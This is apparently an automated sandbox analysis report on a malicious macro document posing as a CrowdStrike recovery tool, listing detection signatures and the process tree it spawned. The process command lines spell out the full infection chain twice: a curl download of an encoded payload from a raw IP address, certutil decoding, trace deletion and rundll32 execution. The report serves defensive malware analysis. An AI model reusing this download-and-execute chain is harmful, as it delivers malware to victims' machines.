Edit tour
Windows
Analysis Report
New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with many string operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Downloads suspicious files via Chrome
Machine Learning detection for dropped file
Sigma detected: Legitimate Application Dropped Executable
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Microsoft Office Child Process
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Found potential string decryption / allocating functions
IP address seen in connection with other malware
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w7x64
- WINWORD.EXE (PID: 1384 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) - cmd.exe (PID: 300 cmdline:
"C:\Window s\System32 \cmd.exe" /c xcopy C :\Windows\ System32\c url.exe C: \Users\use r\AppData\ Local\Temp & certuti l -f -enco de C:\User s\user\App Data\Local \Temp\curl .exe C:\Us ers\user\A ppData\Loc al\Temp\cu rl.txt & c ertutil -f -decode C :\Users\us er\AppData \Local\Tem p\curl.txt C:\Users\ user\AppDa ta\Local\T emp\curl.e xe & C:\Us ers\user\A ppData\Loc al\Temp\cu rl.exe htt p://172.10 4.160.126: 8099/paylo ad2.txt -o C:\Users\ user\AppDa ta\Local\T emp\mscors vc.txt & c ertutil -f -decode C :\Users\us er\AppData \Local\Tem p\mscorsvc .txt C:\Us ers\user\A ppData\Loc al\Temp\ms corsvc.dll & del C:\ Users\user \AppData\L ocal\Temp\ curl.exe & del C:\Us ers\user\A ppData\Loc al\Temp\cu rl.txt & d el C:\User s\user\App Data\Local \Temp\curl .exe & del C:\Users\ user\AppDa ta\Local\T emp\mscors vc.txt & S TART " " r undll32 C: \Users\use r\AppData\ Local\Temp \mscorsvc. dll,DllMai n & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - xcopy.exe (PID: 3096 cmdline:
xcopy C:\W indows\Sys tem32\curl .exe C:\Us ers\user\A ppData\Loc al\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898) - certutil.exe (PID: 3112 cmdline:
certutil - f -encode C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e C:\Users \user\AppD ata\Local\ Temp\curl. txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9) - certutil.exe (PID: 3128 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\curl.tx t C:\Users \user\AppD ata\Local\ Temp\curl. exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9) - curl.exe (PID: 3136 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e http://1 72.104.160 .126:8099/ payload2.t xt -o C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.tx t MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - certutil.exe (PID: 3152 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\mscorsv c.txt C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.dl l MD5: 4586B77B18FA9A8518AF76CA8FD247D9) - rundll32.exe (PID: 3160 cmdline:
rundll32 C :\Users\us er\AppData \Local\Tem p\mscorsvc .dll,DllMa in MD5: DD81D91FF3B0763C392422865C9AC12E)
- chrome.exe (PID: 3236 cmdline:
"C:\Progra m Files (x 86)\Google \Chrome\Ap plication\ chrome.exe " --start- maximized "about:bla nk" MD5: FFA2B8E17F645BCC20F0E0201FEF83ED) - chrome.exe (PID: 3428 cmdline:
"C:\Progra m Files (x 86)\Google \Chrome\Ap plication\ chrome.exe " --type=u tility --u tility-sub -type=netw ork.mojom. NetworkSer vice --lan g=en-US -- service-sa ndbox-type =none --mo jo-platfor m-channel- handle=135 2 --field- trial-hand le=1336,i, 1046118267 5022210413 ,301319062 5299692533 ,131072 -- disable-fe atures=Opt imizationG uideModelD ownloading ,Optimizat ionHints,O ptimizatio nHintsFetc hing,Optim izationTar getPredict ion /prefe tch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED) - chrome.exe (PID: 3224 cmdline:
"C:\Progra m Files (x 86)\Google \Chrome\Ap plication\ chrome.exe " --type=u tility --u tility-sub -type=chro me.mojom.F ileUtilSer vice --lan g=en-US -- service-sa ndbox-type =service - -mojo-plat form-chann el-handle= 2208 --fie ld-trial-h andle=1336 ,i,1046118 2675022210 413,301319 0625299692 533,131072 --disable -features= Optimizati onGuideMod elDownload ing,Optimi zationHint s,Optimiza tionHintsF etching,Op timization TargetPred iction /pr efetch:8 MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
- chrome.exe (PID: 300 cmdline:
"C:\Progra m Files (x 86)\Google \Chrome\Ap plication\ chrome.exe " "https:/ /go.micros oft.com/fw link/?link id=2280386 " MD5: FFA2B8E17F645BCC20F0E0201FEF83ED)
- WINWORD.EXE (PID: 300 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) - cmd.exe (PID: 3616 cmdline:
"C:\Window s\System32 \cmd.exe" /c xcopy C :\Windows\ System32\c url.exe C: \Users\use r\AppData\ Local\Temp & certuti l -f -enco de C:\User s\user\App Data\Local \Temp\curl .exe C:\Us ers\user\A ppData\Loc al\Temp\cu rl.txt & c ertutil -f -decode C :\Users\us er\AppData \Local\Tem p\curl.txt C:\Users\ user\AppDa ta\Local\T emp\curl.e xe & C:\Us ers\user\A ppData\Loc al\Temp\cu rl.exe htt p://172.10 4.160.126: 8099/paylo ad2.txt -o C:\Users\ user\AppDa ta\Local\T emp\mscors vc.txt & c ertutil -f -decode C :\Users\us er\AppData \Local\Tem p\mscorsvc .txt C:\Us ers\user\A ppData\Loc al\Temp\ms corsvc.dll & del C:\ Users\user \AppData\L ocal\Temp\ curl.exe & del C:\Us ers\user\A ppData\Loc al\Temp\cu rl.txt & d el C:\User s\user\App Data\Local \Temp\curl .exe & del C:\Users\ user\AppDa ta\Local\T emp\mscors vc.txt & S TART " " r undll32 C: \Users\use r\AppData\ Local\Temp \mscorsvc. dll,DllMai n & exit MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - xcopy.exe (PID: 3644 cmdline:
xcopy C:\W indows\Sys tem32\curl .exe C:\Us ers\user\A ppData\Loc al\Temp MD5: 20CF8728C55A8743AAC86FB8D30EA898) - certutil.exe (PID: 3548 cmdline:
certutil - f -encode C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e C:\Users \user\AppD ata\Local\ Temp\curl. txt MD5: 4586B77B18FA9A8518AF76CA8FD247D9) - certutil.exe (PID: 3796 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\curl.tx t C:\Users \user\AppD ata\Local\ Temp\curl. exe MD5: 4586B77B18FA9A8518AF76CA8FD247D9) - curl.exe (PID: 2432 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\curl.ex e http://1 72.104.160 .126:8099/ payload2.t xt -o C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.tx t MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - certutil.exe (PID: 2724 cmdline:
certutil - f -decode C:\Users\u ser\AppDat a\Local\Te mp\mscorsv c.txt C:\U sers\user\ AppData\Lo cal\Temp\m scorsvc.dl l MD5: 4586B77B18FA9A8518AF76CA8FD247D9) - rundll32.exe (PID: 2360 cmdline:
rundll32 C :\Users\us er\AppData \Local\Tem p\mscorsvc .dll,DllMa in MD5: DD81D91FF3B0763C392422865C9AC12E)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: frack113, Florian Roth (Nextron Systems): |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: |